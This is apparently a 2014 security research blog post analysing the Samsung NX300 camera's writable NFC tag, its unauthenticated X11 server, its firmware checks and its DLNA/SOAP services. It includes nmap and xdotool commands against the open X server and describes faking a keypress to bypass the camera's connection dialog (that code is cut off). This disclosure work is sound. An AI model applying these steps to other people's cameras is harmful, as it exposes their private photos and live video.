Georg Lukas, 2014-05-07 18:45
The Samsung NX300
smart camera is a middle-class mirrorless camera with NFC and WiFi
connectivity. You can connect it with your local WiFi network to upload
directly to cloud services, share pictures via
DLNA or
obtain remote access from your smartphone. For the latter, the camera provides
the Remote Viewfinder and MobileLink modes where it creates an
unencrypted access point with wide-open access to its X server and any
data which you would expect only to be available to your smartphone.
Because hardware engineers suck at software security, nothing else was to be
expected. Nevertheless, the following will show how badly they suck, if only
for documentation purposes.
This post is only covering the network connectivity of the NX300.
Read the follow-up posts for getting a root shell
and adding features to the camera.
The smartphone app deserves some attention as well. Feel free to do your own
research and post it to the
project wiki.
The findings in this blog posts are based on firmware version 1.31.
NFC Tag
The NFC “connectivity” is an
NTAG203
created by NXP, which is pre-programmed with an NDEF message to download and
launch the (horribly designed)
Samsung SMART CAMERA App
from Google Play, and to inform the app about the access point name provided
by this individual camera:
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
The tag is writable, so a malicious user can easily “hack” your camera by
rewriting its tag to download some evil app, or to open nasty links in your
web browser, merely by touching it with an NFC-enabled smartphone. This was
confirmed by replacing the tag content with an URL.
The deployed tag supports permanent write-locking, so if you know a prankster
nerd, you might end up with a camera stuck redirecting you to a hardcore
porn site.
WiFi Networking
You can configure the NX300 to enter your WiFi network, it will behave like a
regular client with some open services, like DLNA. Let us see what exactly is
offered by performing a port scan:
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6000/tcp open X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
This scan was performed while the “E-Mail” application was open. In AllShare
Play and MobileLink modes, 7676/tcp is opened in addition. Further, in
Remote Viewfinder mode, the camera also opens 7679/tcp.
X Server
Wait, what? X11 as an open service? Could that be true? For sure it is
access-locked via TCP to prevent abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
480x800 60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
Nope! This is really an unprotected X server! It is running
Enlightenment! And we can even run apps on
it! But besides displaying stuff on the camera the fun seems very limited:
X11 Key Bindings
A short investigation using xev outlines that the physical keys on the
camera body are bound to X11 key events as follows:
| On/Off | XF86PowerOff (only when turning off) |
|---|---|
| Scroll Wheel | XF86ScrollUp / XF86ScrollDown |
| Direct Link | XF86Mail |
| Mode Wheel | F1 .. F10 |
| Video Rec | XF86WebCam |
| +/- | XF86Reload |
| Menu | Menu |
| Fn | XF86HomePage |
| Keypad | KP_Left .. KP_Down, KP_Enter |
| Play | XF86Tools |
| Delete | KP_Delete |
WiFi Client: Firmware Update Check
When the camera goes online, it performs a firmware version check.
First, it retrieves http://gld.samsungosp.com:
Request:
GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
200 OK
This really looks like a no-op. But maybe this is a backdoor to allow
for remote code execution? Who knows…
Then, a query to
http://ipv4.connman.net/online/status.html
returns an empty document, but has your location data (apparently
obtained from the IP) in the headers:
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
Wow! They know where I live! At least they do not transmit any unique identifiers with the query.
As the last step, the camera is
asking for firmware versions
and gets redirected to an XML document with the ChangeLog.
Known versions so far:
WiFi Access Point: UPnP/DLNA
Two of the on-camera apps (MobileLink, Remote Viewfinder) open an
unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX
is the device part of its MAC address). Fortunately, Samsung’s engineers were
smart and added a user confirmation dialog to the camera UI, to prevent remote
abuse:
Unfortunately, this dialog is running on a wide-open X server, so all we need
is to fake an KP_Return event (based on an
example by bharathisubramanian),
and we can connect with whichever client, stream a live video or download all
the private pictures from the SD card, depending on the enabled mode:
#include
DLNA Service: Remote Viewfinder
The DLNA service is exposing some camera features, which are queried and
used by the Android app. The device’s friendly name is [Camera]NX300,
as can be queried via HTTP from http://nx300:7676/smp_2_:
Additional SOAP services are provided for changing settings like focus and
flash (/smp_3_):
| Function | Arguments | Result |
|---|---|---|
| GetSystemUpdateID | Id | |
| GetSearchCapabilities | SearchCaps | |
| GetSortCapabilities | SortCaps | |
| Browse | ObjectID BrowseFlag Filter StartingIndex RequestedCount SortCriteria |
Result NumberReturned TotalMatches UpdateID |
| GetIP | GETIPRESULT | |
| GetInfomation | GETINFORMATIONRESULT StreamUrl | |
| SetResolution | RESOLUTION | |
| ZoomIN | CURRENTZOOM | |
| ZoomOUT | CURRENTZOOM | |
| MULTIAF | AFSTATUS | |
| AF | AFSTATUS | |
| setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
| touchAF | AFPOSITION | TOUCHAF_RESULT |
| AFRELEASE | AFRELEASERESULT | |
| ReleaseSelfTimer | RELEASETIMER | |
| Shot | AFSHOTRESULT | |
| ShotWithGPS | GPSINFO | AFSHOTRESULT |
| SetLED | LEDTIME | |
| SetFlash | FLASHMODE | |
| SetStreamQuality | Quality |
Another service is available for picture / video streaming (/smp_4_):
version="1.0" encoding="utf-8"?>
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
After triggering the right commands, a live video stream should be available
from http://nx300:7679/livestream.avi. However, a brief attempt to get
some video with wget or mplayer failed.
The “source code” package provided on
Samsung’s OSS Release Center is 834 MBytes
compressed and mainly contains three copies of the rootfs image (400-500MB
each), and then some scripts. The actual build root is hidden under the second
paper sheet link in the “Announcements” column.
Also, there are Obamapics in
TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.
The project is built on an ancient version of
Tizen, on which I am no expert. Somebody else
needs to take this stuff apart, make a proper build environment, or port
OpenWRT to it.
Full series:
